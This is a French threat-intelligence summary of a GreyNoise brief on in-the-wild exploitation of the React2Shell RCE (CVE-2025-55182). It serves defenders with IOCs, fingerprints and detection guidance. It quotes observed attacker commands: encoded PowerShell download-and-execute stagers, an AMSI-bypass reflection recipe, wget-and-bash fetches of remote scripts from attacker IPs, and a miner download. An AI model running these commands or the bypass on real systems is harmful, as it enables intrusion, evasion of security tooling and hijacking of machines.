Source et contexte: GreyNoise publie exceptionnellement un brief « At The Edge » ouvert au public (mise à jour au 8 décembre 2025) sur l’exploitation opportuniste de CVE-2025-55182 (« React2Shell »), une RCE non authentifiée affectant le protocole Flight des React Server Components et des écosystèmes en aval comme Next.js, avec des correctifs déjà disponibles.

GreyNoise observe une exploitation rapide post-divulgation et un volume stable d’attaques. Au 2025‑12‑08, 362 IPs uniques ont tenté l’exploitation ; 152 (≈42 %) comportaient des charges actives analysables. Les sources sont géographiquement variées, reflétant à la fois botnets et acteurs plus outillés. L’infrastructure est majoritairement « fraîche » (vue après juillet 2025), avec près de 50 % des IPs observées pour la première fois en décembre 2025.

Les schémas d’attaque relevés (sur 97 échantillons actifs) incluent :

  • Validation PoE par calculs arithmétiques (ex. powershell -c “40138*41979”).
  • Collecte d’infos système (uname -a, whoami, hostname).
  • Reverse shells / downloaders, persistance SSH, exécution de scripts distants (souvent PowerShell encodé), reconnaissance de répertoires (pwd), commandes multiplateformes (sh et powershell).
  • Chaîne standard: PowerShell -enc + DownloadString + IEX, puis bypass AMSI via réflexion (réglage de System.Management.Automation.AmsiUtils.amsiInitFailed = true) avant exécution du stage suivant.

La composition du trafic est dominée par l’automatisation: principaux User-Agents extraits — Go-http-client/1.1, un UA finissant par Assetnote/1.0.0 sur Chrome 60, Safari 17.2.1, ainsi que de faibles volumes aiohttp et python-requests. Les empreintes JA4T/JA4H se concentrent sur quelques paires et ASN (notamment Pays-Bas, Chine, États-Unis, Hong Kong). GreyNoise note un glissement progressif de la CVE dans des kits d’exploitation de botnets (dont Mirai).

IOCs et TTPs clés 🧩

  • Stage-1/2 fetch: URL http://23[.]235[.]188[.]3:652/qMqSb (port 652/tcp, path /qMqSb).
  • Primitifs stagers PowerShell: powershell.exe -enc <base64> (UTF‑16LE), IEX (New-Object System.Net.Webclient).DownloadString('...').
  • Bypass AMSI: Type System.Management.Automation.AmsiUtils, champ amsiInitFailed, setter: .GetField(..., "NonPublic,Static").SetValue($null,$true).
  • Probes PoE: powershell -c "<5-digit>*<5-digit>" (multiples paires déterministes).
  • UAs: Go-http-client/1.1, Assetnote/1.0.0 on Chrome 60, Safari 17.2.1, aiohttp, python-requests.
  • Exemples de payloads/réseau observés (sélection):
    • curl 2f7ac6[.]ceye[.]io, ping -c 7 45[.]157[.]233[.]80, ping 5axzi7[.]dnslog[.]cn.
    • Téléchargement/exécution de scripts: wget http://162[.]215[.]170[.]26:3000/sex[.]sh && bash sex[.]sh, wget http://46[.]36[.]37[.]85:12000/sex[.]sh && bash sex[.]sh, wget hxxp[://]vps-zap812595-1[.]zap-srv[.]com:3000/sex[.]sh && bash ....
    • Minage potentiel: curl -s -L hxxps[://]raw[.]githubusercontent[.]com/C3Pool/xmrig....
  • Indicateurs TLS/JA4 (extraits): paires telles que 42340_2-4-8-1-3_1460_11 + po11nn060000_3865ae1cc1d9_..., 64240_2-1-3-1-1-4_1400_8 + po10nn090000_75eeec6218a0_....

Détection et priorités (selon GreyNoise) 🔎

  • Blocage dynamique d’IP via GreyNoise Block et blocklists ciblées de la plateforme.
  • Sur endpoints Windows: alertes sur powershell.exe/pwsh.exe avec -enc/-EncodedCommand, DownloadString(, IEX.
  • Avec Event ID 4104: détection de deux termes parmi System.Management.Automation.AmsiUtils, amsiInitFailed, GetField, NonPublic,Static, SetValue.
  • Agrégation de détections sur des motifs répétés de powershell -c "<digits>*<digits>" sur une fenêtre courte.

Conclusion: Il s’agit d’une analyse de menace visant à partager une vue d’ensemble des tentatives d’exploitation de React2Shell, les IOCs/TTPs observés et des recommandations de réponse prioritaires basées sur la télémétrie GreyNoise.

🧠 TTPs et IOCs détectés

TTP

[“Exploitation d’une vulnérabilité RCE non authentifiée”, “Utilisation de PowerShell encodé pour l’exécution de commandes”, ‘Bypass AMSI via réflexion’, “Collecte d’informations système”, ‘Reverse shells et downloaders’, ‘Persistance SSH’, ‘Exécution de scripts distants’, ‘Reconnaissance de répertoires’, ‘Commandes multiplateformes’, ‘Utilisation de User-Agents automatisés’, “Utilisation de botnets pour l’exploitation”, ‘Minage potentiel de cryptomonnaies’]

IOC

[‘IP: 23.235.188.3’, ‘Port: 652/tcp’, ‘Path: /qMqSb’, ‘Domain: 2f7ac6.ceye.io’, ‘Domain: 5axzi7.dnslog.cn’, ‘IP: 45.157.233.80’, ‘IP: 162.215.170.26’, ‘IP: 46.36.37.85’, ‘Domain: vps-zap812595-1.zap-srv.com’, ‘URL: hxxps://raw.githubusercontent.com/C3Pool/xmrig…’]

🔗 Source originale : https://www.greynoise.io/blog/cve-2025-55182-react2shell-opportunistic-exploitation-in-the-wild-what-the-greynoise-observation-grid-is-seeing-so-far